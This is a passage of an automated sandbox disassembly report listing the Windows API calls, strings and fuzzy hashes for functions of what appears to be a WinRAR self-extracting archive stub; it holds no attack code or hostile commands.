                                                            • Instruction ID: 3ff44a9b85ba7bd3eb02651d2cc455e409e3082e7270b1e8328b8c5f5866f261
                                                            • Opcode Fuzzy Hash: 612b387d7c9e5192f5a3db4afd794858d8e907d3b69a33185c5527c2253ea975
                                                            • Instruction Fuzzy Hash: C22181B294024CAEEB20DFA4CD85FEF3BE8BF04300F040532FA159A192E771D6558B55
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0004C02A,00000008,?,00000000,?,0004E665,?,00000000), ref: 0005217E
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0004C02A,00000008,?,00000000,?,0004E665,?,00000000), ref: 00052188
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0004C02A,00000008,?,00000000,?,0004E665,?,00000000), ref: 00052198
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 000521B0
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: 862bfc603b81cf11891335224b99c95230a8c9159021c9aee15abd5c104c0b36
                                                            • Instruction ID: 71f900cbc056bb3aa265993aabf083e8e1a6e0b24a109554a5d89b3fbf0c7cd4
                                                            • Opcode Fuzzy Hash: 862bfc603b81cf11891335224b99c95230a8c9159021c9aee15abd5c104c0b36
                                                            • Instruction Fuzzy Hash: 571194B1604B049FD3215F699C849A7FBDCEF65745F10482EF6DAC2200D77559408B68
                                                            APIs
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • EndDialog.USER32(?,00000001), ref: 0005C34E
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 0005C366
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 0005C394
                                                            Strings
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1
                                                            • API String ID: 445417207-3292211884
                                                            • Opcode ID: 314b77840878b09ae40d59e9b76b77b4c616c96d301fe2defa51da6a6cc11188
                                                            • Instruction ID: e2db1c296bdb8ed69aa067ccdcd2790301ce7fa91385de58b6937f794ead6d61
                                                            • Opcode Fuzzy Hash: 314b77840878b09ae40d59e9b76b77b4c616c96d301fe2defa51da6a6cc11188
                                                            • Instruction Fuzzy Hash: 6A11657290021CBAEB205B649D89FFF377DEB4A756F004421FF05F6081C2B59A1A96A5
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: 08e2eed53249fa8685a33f99ebba65875abb1cd0e408e82a1a4b1dcf9a53581b
                                                            • Instruction ID: db2f7488082821f41f499e8380a229bf4be04494c2d9ba22120278e15486d83d
                                                            • Opcode Fuzzy Hash: 08e2eed53249fa8685a33f99ebba65875abb1cd0e408e82a1a4b1dcf9a53581b
                                                            • Instruction Fuzzy Hash: F201D871604684AFFB154F28EC04A573FA8F75A396F004426FD8582230D3798954DBB1
                                                            APIs
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00044945
                                                              • Part of subcall function 0005FB6D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0005FB79
                                                              • Part of subcall function 0005FB6D: ___delayLoadHelper2@8.DELAYIMP ref: 0005FB9F
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00044950
                                                            Strings
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                                            • String ID: string too long$vector too long
                                                            • API String ID: 2355824318-1617939282
                                                            • Opcode ID: ff7d4abb8d624d7aa2ad1222467f783b556ebe4dadeeeaebcb1996c1aced1141
                                                            • Instruction ID: 546b2ac3b5bb57e77bdd4753e7c117cf4a517b193c6514e6ffbf61ae74b0f4a1
                                                            • Opcode Fuzzy Hash: ff7d4abb8d624d7aa2ad1222467f783b556ebe4dadeeeaebcb1996c1aced1141
                                                            • Instruction Fuzzy Hash: 01F0A7B1210314AB86247F59EC4594BB3EDEF85B51310492EF945C7606C3B0ED0487B9
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0005EBC4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005EC00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: 8025381ba5bdcf75765586444b82585d866244e383ee3d625cf02f1f0aa1099b
                                                            • Instruction ID: d16fd20dd0deba82952d89669a73b0a65f785bfc331fcb036e3f119ab13e9f52
                                                            • Opcode Fuzzy Hash: 8025381ba5bdcf75765586444b82585d866244e383ee3d625cf02f1f0aa1099b
                                                            • Instruction Fuzzy Hash: 30F0A7B1C01234A6DB203B90CC0AEFB3A9CDF14B43B450061FD8A66092E769C988C6B1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
                                                            • Instruction ID: 4a7498bce9d91d03bae367a448774e322cb0fa81e146e7561ede498639d0e350
                                                            • Opcode Fuzzy Hash: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
                                                            • Instruction Fuzzy Hash: F2A13971B007869FEB21EF58C8917AEBBE7EF56320F144169D585AB242C3389D41CF52
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00048D3C,?,?,?), ref: 0004B7D3
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00048D3C,?,?), ref: 0004B817
                                                            • SetFileTime.KERNEL32(?,00048ACC,?,00000000,?,00000800,?,00048D3C,?,?,?,?,?,?,?,?), ref: 0004B898
                                                            • CloseHandle.KERNEL32(?,?,00000800,?,00048D3C,?,?,?,?,?,?,?,?,?,?), ref: 0004B89F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: 78852771bbf2d4fd3616843079dcf22e66cb70e7c3c40328e1cfa8fefe4e9768
                                                            • Instruction ID: e39f5e467d297a03b8a2d13c4af27078550ed548602b350a84acdfb466155f78
                                                            • Opcode Fuzzy Hash: 78852771bbf2d4fd3616843079dcf22e66cb70e7c3c40328e1cfa8fefe4e9768
                                                            • Instruction Fuzzy Hash: EA41CFB014C381AAE721DE24DC55BEBBBE8AF85300F04092DF5D593191DB68EA48DB56
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: 7ab28f9fdb0f06bf4d67d720e698496aac60826953ea3181dc78371df10bc846
                                                            • Instruction ID: a3aff44d6d68d52e0836cad459e8046a7c29b5ae47e9de11df5c67885fef1aaf
                                                            • Opcode Fuzzy Hash: 7ab28f9fdb0f06bf4d67d720e698496aac60826953ea3181dc78371df10bc846
                                                            • Instruction Fuzzy Hash: B341E571E00A299BDB619F688D099EF7BB8EF05312F000029FD05F7246DB34AD488BE5
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00048512
                                                            • _wcslen.LIBCMT ref: 00048538
                                                            • _wcslen.LIBCMT ref: 000485CF
                                                            • _wcslen.LIBCMT ref: 00048637
                                                              • Part of subcall function 0004B946: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004B971
                                                              • Part of subcall function 0004B3FF: RemoveDirectoryW.KERNEL32(?,?,?,00048629,?), ref: 0004B410
                                                              • Part of subcall function 0004B3FF: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00048629,?), ref: 0004B43E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$DirectoryRemove$CloseFind
                                                            • String ID:
                                                            • API String ID: 973666142-0
                                                            • Opcode ID: f0ed990832f0db059030ebe384a0343020ec48658f97ee16a0a6c6f05874ee98
                                                            • Instruction ID: 55d506142e42bd7d576fba7de1926eb16f9de9e9febfb01e0c6aba1709c5c627
                                                            • Opcode Fuzzy Hash: f0ed990832f0db059030ebe384a0343020ec48658f97ee16a0a6c6f05874ee98
                                                            • Instruction Fuzzy Hash: 5431C8F1800218A6CF61AF64CC45BEE33A5AF04381F058CB6FD4997146EF70DE848B98
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,62E85006,00065924,00000000,00000000,00066959,?,00066959,?,00000001,00065924,62E85006,00000001,00066959,00066959), ref: 0006D9E5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006DA6E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0006DA80
                                                            • __freea.LIBCMT ref: 0006DA89
                                                              • Part of subcall function 0006A64E: RtlAllocateHeap.NTDLL(00000000,?,?,?,000653E4,?,0000015D,?,?,?,?,000668C0,000000FF,00000000,?,?), ref: 0006A680
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: bb9023f86fec1e49e819d560ee437151c647d0f4673e9774f2df418347464c78
                                                            • Instruction ID: 77c8266e96c30c8094865e8732bdcde61a07e26ce9307b699653efe1e6c3c2e1
                                                            • Opcode Fuzzy Hash: bb9023f86fec1e49e819d560ee437151c647d0f4673e9774f2df418347464c78
                                                            • Instruction Fuzzy Hash: 4331AD72E0420AABDF24DFA4DC45EEE7BA6EB40310B054229FC04E6151EB39CD90DBA1
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0005B646
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0005B655
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0005B663
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0005B671
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 39d63d6cbb830535db6a452323908e78669751ca32d6215822efd7fcefae0424
                                                            • Instruction ID: a4f246504bb2534f4a25b35d0707c05be67efaf74101c48547b24170fd2b8a1b
                                                            • Opcode Fuzzy Hash: 39d63d6cbb830535db6a452323908e78669751ca32d6215822efd7fcefae0424
                                                            • Instruction Fuzzy Hash: 6FE0EC31A41E61A7F6601B606C0DF8B3B64BB07713F014001FB059A190DAAC44088BE1
                                                            APIs
                                                              • Part of subcall function 0005B679: GetDC.USER32(00000000), ref: 0005B67D
                                                              • Part of subcall function 0005B679: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0005B688
                                                              • Part of subcall function 0005B679: ReleaseDC.USER32(00000000,00000000), ref: 0005B693
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 0005B81C
                                                              • Part of subcall function 0005BAAE: GetDC.USER32(00000000), ref: 0005BAB7
                                                              • Part of subcall function 0005BAAE: GetObjectW.GDI32(?,00000018,?), ref: 0005BAE6
                                                              • Part of subcall function 0005BAAE: ReleaseDC.USER32(00000000,?), ref: 0005BB7E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            • Opcode ID: 32e8f77cba2d631015f726a244b25dab51e512cd22e6c579141f0536736586cf
                                                            • Instruction ID: 829af8a5e188e1ab4677b82465c24742f06de7dcd7a937673fded292aabb7ea9
                                                            • Opcode Fuzzy Hash: 32e8f77cba2d631015f726a244b25dab51e512cd22e6c579141f0536736586cf
                                                            • Instruction Fuzzy Hash: B791F271604744AFE621DF25C844E2BBBE8FFC9701F00491EF99AD7261DB35A846CB62
                                                            APIs
                                                            • _free.LIBCMT ref: 0006C334
                                                              • Part of subcall function 00065036: IsProcessorFeaturePresent.KERNEL32(00000017,00065008,00000000,00069FB4,00000000,00000000,00000000,00000016,?,?,00065015,00000000,00000000,00000000,00000000,00000000), ref: 00065038
                                                              • Part of subcall function 00065036: GetCurrentProcess.KERNEL32(C0000417,00069FB4,00000000,?,00000003,0006A3E8), ref: 0006505A
                                                              • Part of subcall function 00065036: TerminateProcess.KERNEL32(00000000,?,00000003,0006A3E8), ref: 00065061
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                            • String ID: *?$.
                                                            • API String ID: 2667617558-3972193922
                                                            • Opcode ID: d880ea29d1525385f5bc4d26a230f40480b8b7b7c38aab8f8975374564cc868a
                                                            • Instruction ID: 33d15564fc76b0d7ecf11294ca6538d44a59cabf8730ba0a27e70a436d72ccc4
                                                            • Opcode Fuzzy Hash: d880ea29d1525385f5bc4d26a230f40480b8b7b7c38aab8f8975374564cc868a
                                                            • Instruction Fuzzy Hash: BE516175E0021A9FEF14DFA8C881ABDB7F6FF58314F24816AE895E7341E6359E018B50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000480A3
                                                              • Part of subcall function 000518E0: _wcslen.LIBCMT ref: 000518E6
                                                              • Part of subcall function 0004B946: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004B971
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00048242
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B8DA
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B90B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: 4124a3ed5096527422f56c002fe4b5a042f3b13b7cbd1bb0c86d711bedf05754
                                                            • Instruction ID: def0b18e79ab7b55019482c2567f995a2ed347a2722b5906c074a5611d71beda
                                                            • Opcode Fuzzy Hash: 4124a3ed5096527422f56c002fe4b5a042f3b13b7cbd1bb0c86d711bedf05754
                                                            • Instruction Fuzzy Hash: D25184B1900258AAEB25EB50CD59EEF737DAF45300F0084B5B609A6093DF745F89CF65
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: 46c22a83f6ce21bc8437e1c5761ee0c4099f8dd22d059f2be622ad647ffe15b9
                                                            • Instruction ID: 996a7e2aa2e9eb691aa1196638ec487f75d6f731f14e15542f5176abcd332583
                                                            • Opcode Fuzzy Hash: 46c22a83f6ce21bc8437e1c5761ee0c4099f8dd22d059f2be622ad647ffe15b9
                                                            • Instruction Fuzzy Hash: 9421C272504B065EE731EAA4C845EAB73ECDF80756F40042AFA44C7142FB64EE8C82A2
                                                            APIs
                                                              • Part of subcall function 00050600: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0005061F
                                                              • Part of subcall function 00050600: GetProcAddress.KERNEL32(0008A1F0,CryptUnprotectMemory), ref: 0005062F
                                                            • GetCurrentProcessId.KERNEL32(?,00000200,?,00050670), ref: 00050703
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 000506BA
                                                            • CryptUnprotectMemory failed, xrefs: 000506FB
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 9412165fdccfc3928bdac08b45011e50a23cda42eeae194820678ab6b9bb4551
                                                            • Instruction ID: 87cda05097c13906f38637fbc5cdba7aebe9028823d5073367b56d4546309bf5
                                                            • Opcode Fuzzy Hash: 9412165fdccfc3928bdac08b45011e50a23cda42eeae194820678ab6b9bb4551
                                                            • Instruction Fuzzy Hash: B3117832E04229AFEF125F20DC4596F3B94FF44B61B018116FC446B292DB38AD968FC9
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0004CDC7
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            Strings
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1543624204-3142399695
                                                            • Opcode ID: 1ca83db36e1ba5b0defa48f6a079768a012d99cd306b95e831d9b8ef85dcc55e
                                                            • Instruction ID: 0b7ff677c6504b92267b978e900bbc17a87e21ec71112946c7f9ff7ae51723da
                                                            • Opcode Fuzzy Hash: 1ca83db36e1ba5b0defa48f6a079768a012d99cd306b95e831d9b8ef85dcc55e
                                                            • Instruction Fuzzy Hash: BA01DDA390532179E670A77ADC46DABA7ECDF96770750442EF445C6053EB30D450C2F5
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00060C0D
                                                            • ___raise_securityfailure.LIBCMT ref: 00060CF5
                                                            Strings
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                            • String ID: x=
                                                            • API String ID: 3761405300-798900570
                                                            • Opcode ID: 028d63c59ee4c0ce756c95e1b2a947c88ecfd2d929b39b55d9b83c2bdee351e3
                                                            • Instruction ID: d6e506cc8f5c869dcd13ae8ddd7d936309e07b0807e163540afc972beef53eb9
                                                            • Opcode Fuzzy Hash: 028d63c59ee4c0ce756c95e1b2a947c88ecfd2d929b39b55d9b83c2bdee351e3
                                                            • Instruction Fuzzy Hash: 5521D3B5940A00EEF740CF29F986644BBE5FB5A714F10902AF5099B3E1E3B99A84CF04
                                                            APIs
                                                              • Part of subcall function 0004F5E8: _swprintf.LIBCMT ref: 0004F60E
                                                              • Part of subcall function 0004F5E8: _strlen.LIBCMT ref: 0004F62F
                                                              • Part of subcall function 0004F5E8: SetDlgItemTextW.USER32(?,00080274,?), ref: 0004F68F
                                                              • Part of subcall function 0004F5E8: GetWindowRect.USER32(?,?), ref: 0004F6C9
                                                              • Part of subcall function 0004F5E8: GetClientRect.USER32(?,?), ref: 0004F6D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                            • SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            Strings
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: f90c7abac2ae2b5ac2803298ac7db1c851428f89626d6cf6ba35d71ae2ced96e
                                                            • Instruction ID: e7eaec00a92f117cae49444f4eee2cfed385a3efcab3dd3b287ed4eccdcf577f
                                                            • Opcode Fuzzy Hash: f90c7abac2ae2b5ac2803298ac7db1c851428f89626d6cf6ba35d71ae2ced96e
                                                            • Instruction Fuzzy Hash: ADF08CB0140A88BADF651F208C0DBF93B98BB21786F048034FD84545A2DB79CA94EB18
                                                            APIs
                                                              • Part of subcall function 0006CF40: GetEnvironmentStringsW.KERNEL32 ref: 0006CF49
                                                              • Part of subcall function 0006CF40: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006CF6C
                                                              • Part of subcall function 0006CF40: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006CF92
                                                              • Part of subcall function 0006CF40: _free.LIBCMT ref: 0006CFA5
                                                              • Part of subcall function 0006CF40: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006CFB4
                                                            • _free.LIBCMT ref: 000694C0
                                                            • _free.LIBCMT ref: 000694C7
                                                            Strings
                                                            Similarity
                                                            • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID: hB
                                                            • API String ID: 400815659-2602534675
                                                            • Opcode ID: 5ecf549f37bf2f83e269e5d8fb48ff019d1f311b143b6088cf2921fd81aa65fb
                                                            • Instruction ID: d9d47cdc7785e37877eb72f98dcf6a17d650fbcb15e3d71811fdeb7e101606f0
                                                            • Opcode Fuzzy Hash: 5ecf549f37bf2f83e269e5d8fb48ff019d1f311b143b6088cf2921fd81aa65fb
                                                            • Instruction Fuzzy Hash: E3E06526A0A91145AA75327E6C06EAF164B5FC2731B624366F824965C7DEA8C80301A6
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,000523F9,?,?,0005246F,?,?,?,?,?,00052459), ref: 000522E2
                                                            • GetLastError.KERNEL32(?,?,0005246F,?,?,?,?,?,00052459), ref: 000522EE
                                                              • Part of subcall function 000476C9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000476E7
